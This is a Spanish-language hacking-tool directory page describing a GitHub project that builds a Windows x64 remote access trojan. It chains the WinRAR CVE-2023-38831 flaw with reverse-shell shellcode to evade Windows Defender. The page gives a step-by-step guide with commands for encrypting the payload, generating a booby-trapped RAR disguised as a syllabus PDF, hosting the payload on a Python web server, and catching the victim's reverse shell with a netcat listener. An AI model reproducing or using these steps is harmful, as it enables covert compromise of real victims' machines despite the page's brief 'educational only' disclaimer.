Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/maorbuskila/windows-x64-rat
Análisis de VulnerabilidadesExplotaciónShellcodeComando y ControlAprendizaje y EducaciónDesarrollo de PayloadsTroyano de Acceso RemotoExplotación de Binarios
GitHubmaorbuskila/windows-x64-rat

Windows-X64-RAT

Troyano de Acceso Remoto (RAT) para Windows x64 que utiliza una combinación de la vulnerabilidad CVE-2023-38831 (vulnerabilidad de WinRAR < 6.23) y la técnica de explotación Shellcode.

Ver Repositorio
250hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Troyano de Acceso Remoto (RAT) para Windows x64

Objetivo

Desarrollar un RAT para Windows x64 utilizando CVE-2023-38831 (WinRAR < 6.23) y explotación de shellcode para evadir Windows Defender.

Descripción del Sistema

  1. Inicialización del Shellcode
    • Generar shellcode usando Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode.
  2. Explicación de main.cpp
    • Inyectar y ejecutar shellcode en memoria para establecer una conexión TCP inversa.
  3. Compilar y Cifrar main.cpp
    • Compilar el archivo C++ en un ejecutable y cifrarlo.
  4. Explotar WinRAR CVE-2023-38831
    • Usar la vulnerabilidad para descargar, descifrar y ejecutar el RAT cifrado.
  5. Descifrar y Ejecutar Script (decrypt_file.ps1)
    • Descifrar y ejecutar el ejecutable descargado.
  6. Ejecución
    • Abrir el PDF/imagen manipulado para activar la conexión de shell inversa.

Guía de Explotación

Advertencia: Esta información es solo para fines educativos. El uso no autorizado de estas técnicas es ilegal y no ético.

Instrucciones Paso a Paso

  1. Crear Shellcode

    • Usar 51721.py para generar el shellcode inicial.
  2. Modificar y Compilar el Shellcode

    • Realizar las modificaciones necesarias al shellcode.
    • Compilar el código modificado.
  3. Cifrar el Ejecutable

    • Usar decrypt_file.ps1 para cifrar el ejecutable compilado:
      root@kitploit:~
      .\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
      
  4. Crear un Archivo WinRAR

    • Usar cve-2023-38831-exp-gen.py para crear el archivo:
      root@kitploit:~
      python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
      
  5. Configurar un Servidor Python para Descarga de Archivos

    • Navegar al directorio que contiene enc_main.exe y decrypt_file.ps1.
    • Iniciar un servidor HTTP de Python:
      root@kitploit:~
      python3 -m http.server 8000
      
  6. Prepararse para Escuchar el Shell TCP Inverso

    • Abrir Netcat para escuchar conexiones TCP entrantes:
      root@kitploit:~
      nc -lnvp 4444
      
  7. Activar el Shell TCP Inverso

    • Cuando la víctima abra el archivo PDF, se activará la conexión TCP inversa, dándote acceso a su máquina.

Descargo de Responsabilidad

Esta información se proporciona solo con fines educativos. El uso de este exploit sin permiso explícito es ilegal y no ético. El autor no asume ninguna responsabilidad por el mal uso de esta información.

Descargar herramienta